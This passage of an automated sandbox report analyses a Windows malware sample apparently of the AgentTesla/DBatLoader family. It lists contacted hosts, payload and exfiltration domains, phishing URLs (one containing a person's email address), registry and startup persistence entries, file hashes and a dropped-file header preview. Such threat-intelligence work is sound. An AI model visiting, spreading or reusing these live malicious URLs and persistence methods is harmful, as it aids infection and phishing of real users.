                                                                          http://x1.i.lencr.org/0neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2494316547.0000000006422000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://s82.gocheapweb.comneworigin.exe, 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameneworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2269466131.0000000004171000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.pmail.comx.exe, x.exe, 00000000.00000002.2243776904.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2244527855.000000002206F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2180899022.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111145235.0000000002C11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2200179187.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2262163417.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2181503594.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2352049831.0000000002D22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000018.00000000.2336227084.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 0000001B.00000002.2435548911.0000000002DF2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.2411094000.0000000000416000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                      		high
                                                                                      http://ocsp.sectigo.com0Cx.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://gxe0.com:443/yak/233_WisrysxlfssXx.exe, 00000000.00000002.2184605014.0000000000899000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        198.252.105.91
                                                                                        		gxe0.comCanada
                                                                                        		20068HAWKHOSTCAfalse
                                                                                        104.26.13.205
                                                                                        		api.ipify.orgUnited States
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        51.195.88.199
                                                                                        		s82.gocheapweb.comFrance
                                                                                        		16276OVHFRfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1554496
                                                                                        Start date and time:2024-11-12 15:54:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 12m 55s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:33
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:x.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spre.troj.spyw.evad.winEXE@47/24@4/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 61.5%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 95%
                                                                                        • Number of executed functions: 274
                                                                                        • Number of non-executed functions: 52
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target TrojanAIbot.exe, PID 6628 because it is empty
                                                                                        • Execution Graph export aborted for target neworigin.exe, PID 5328 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 3132 because it is empty
                                                                                        • Execution Graph export aborted for target server_BTC.exe, PID 1268 because it is empty
                                                                                        • Execution Graph export aborted for target server_BTC.exe, PID 2532 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: x.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        09:54:59API Interceptor2x Sleep call for process: x.exe modified
                                                                                        09:55:11API Interceptor5974887x Sleep call for process: neworigin.exe modified
                                                                                        09:55:12API Interceptor16x Sleep call for process: powershell.exe modified
                                                                                        09:55:13API Interceptor2923500x Sleep call for process: TrojanAIbot.exe modified
                                                                                        09:55:20API Interceptor2x Sleep call for process: Wisrysxl.PIF modified
                                                                                        15:55:11Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                        15:55:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                        15:55:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                        15:55:28AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        198.252.105.91DHL-INVOICE-MBV.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
                                                                                        104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                        • api.ipify.org/
                                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • api.ipify.org/

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        s82.gocheapweb.comneworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 51.195.88.199
                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        New_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                                        • 51.195.88.199
                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 51.195.88.199
                                                                                        New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                        • 51.195.88.199
                                                                                        RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 51.195.88.199
                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 51.195.88.199
                                                                                        PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 51.195.88.199
                                                                                        api.ipify.orgneworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 104.26.13.205
                                                                                        Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.13.205
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 104.26.12.205
                                                                                        Swift Copy.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 104.26.13.205
                                                                                        Pago por adelantado_ USD 72000 (50%).exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 172.67.74.152
                                                                                        gxe0.comTC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        pywolwnvd.bizTC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 54.244.188.177
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 54.244.188.177
                                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 54.244.188.177
                                                                                        E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                        • 54.244.188.177
                                                                                        Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 54.244.188.177
                                                                                        AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • 54.244.188.177
                                                                                        SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                        • 54.244.188.177
                                                                                        AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • 54.244.188.177
                                                                                        RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 54.244.188.177
                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 54.244.188.177

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        HAWKHOSTCATC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                        • 198.252.98.54
                                                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 198.252.98.54
                                                                                        PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                        • 198.252.106.191
                                                                                        https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                                                                        • 198.252.106.147
                                                                                        Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                                        • 198.252.106.191
                                                                                        CLOUDFLARENETUSneworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        https://sites.google.com/worth.com/rfp/homeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        https://account-service.fr/PSTPNL/postal1Get hashmaliciousUnknownBrowse
                                                                                        • 104.21.95.157
                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 104.26.13.205
                                                                                        https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                        • 104.26.5.39
                                                                                        https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                        • 172.67.72.174
                                                                                        E7X-XIZ5.emlGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.95.41
                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DkaP7_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA8HMkQB3GP7mtgLvWqf-2F2SUC5eKSSwLqPZnnofRHoc7cSU1xfupfl4il6cb3-2BSKrTYe1odI0Jq1F3XJEtoagDhZ-2B0poPJjuweCyekPO2Y39xfy8FdwLLvVUma4NgVhDhlM-3DGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                        • 162.159.61.3
                                                                                        OVHFRneworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 51.195.88.199
                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        https://sharepoint-business.com/?rid=eprRhgrGet hashmaliciousUnknownBrowse
                                                                                        • 51.178.43.144
                                                                                        http://matomo.uk.oxa.cloudGet hashmaliciousUnknownBrowse
                                                                                        • 51.195.180.103
                                                                                        zgp.elfGet hashmaliciousMiraiBrowse
                                                                                        • 51.222.237.206
                                                                                        mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                                                        • 51.75.33.127
                                                                                        75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                                        • 46.105.114.137
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 51.195.88.199
                                                                                        https://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceeaGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 192.99.218.232
                                                                                        RFQ_TFS-1508-AL NASR userING.exeGet hashmaliciousRedLineBrowse
                                                                                        • 193.70.111.186

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eneworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 104.26.13.205
                                                                                        https://webconference.protected-forms.com/XaGFyNXNiVFNRd1VaOFBwaER2WW5KM1V1S1NLSzZZZDhjN3NKVC9oV2lCRlNRWmVpbVlYY0JzbS81VUd0czRzOHNRWWNGSndpSCtxMm15d3h6SnFIS0VpR2NHcHh2MWo5Nm1wM3lROHdlakpZdnVWYUpHZDJ2LzVyV1ljWjZuK2pHcTByTjRWRm1IRnpPSnVmUFI0TVk2dHN5L1Yxdko0Y01WeHZYck1iM2tvc3l4YVdqSlZabWl2Y0ZwLzQtLVZvU05jS1M1U0FEQjZZeHUtLUw3WXM4dkFWa2t2YTRLMXJEYTRIbGc9PQ==?cid=2270944670Get hashmaliciousKnowBe4Browse
                                                                                        • 104.26.13.205
                                                                                        HvOPtSE7cm.dllGet hashmaliciousElizaRATBrowse
                                                                                        • 104.26.13.205
                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.26.13.205
                                                                                        9LrEuTWP8s.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                        • 104.26.13.205
                                                                                        HAeAec7no3.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                        • 104.26.13.205
                                                                                        EUFOvMxM2H.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                        • 104.26.13.205
                                                                                        https://customization-connect-7617.my.salesforce.com/sfc/p/d3000000Byor/a/d300000000RR/ML8ajzoJU6aJIvGQZGZ6S9rRHpaD1XaytKzcNGEf56gGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.26.13.205
                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                        • 104.26.13.205
                                                                                        a0e9f5d64349fb13191bc781f81f42e1TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 198.252.105.91
                                                                                        Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 198.252.105.91
                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                        • 198.252.105.91
                                                                                        Payment advice_USD75,230.18.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 198.252.105.91
                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 198.252.105.91
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 198.252.105.91
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 198.252.105.91
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 198.252.105.91
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 198.252.105.91

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\Public\Libraries\lxsyrsiW.pifTC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                            NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                              NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                r876789878767.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                  2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                    New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                      E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                        z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                          z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                            C:\Users\Public\Libraries\Wisrysxl.PIFTC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1290240
                                                                                                              Entropy (8bit):5.27777578746112
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:mImGUcsvZZdubv7hfl3WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlmsqjnhMgeiCl7G0nehbGZpbD
                                                                                                              MD5:53AD440DF43FFC879E3B05A7B0B31B23
                                                                                                              SHA1:5D5549FE850ADC0ACDB3B141D0DD2D8C0B38C8DC
                                                                                                              SHA-256:BA6CA839AA57FA9AF7C09F20A9DB215EED99A15E2A73C5AB231060F1676C75E9
                                                                                                              SHA-512:2FECBD193E36F5E718579E51091887628364BC9A341DDAEA4E3460702BC66EA0686C22D22E5541C3A892F917D3D32E50B31226FCA99D93CD8CDA8C726F6841F7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                              C:\Users\Public\Libraries\PNO

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):2.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:X:X
                                                                                                              MD5:D268EDBA3F2644172D611AA9BC7A43A9
                                                                                                              SHA1:8B9A0675D33DC05DB3943960D5B1438970B6E591
                                                                                                              SHA-256:E603E189A414673BC741DF635271CD1B1EF25D8E3A1131DD0E847B632BBD4869
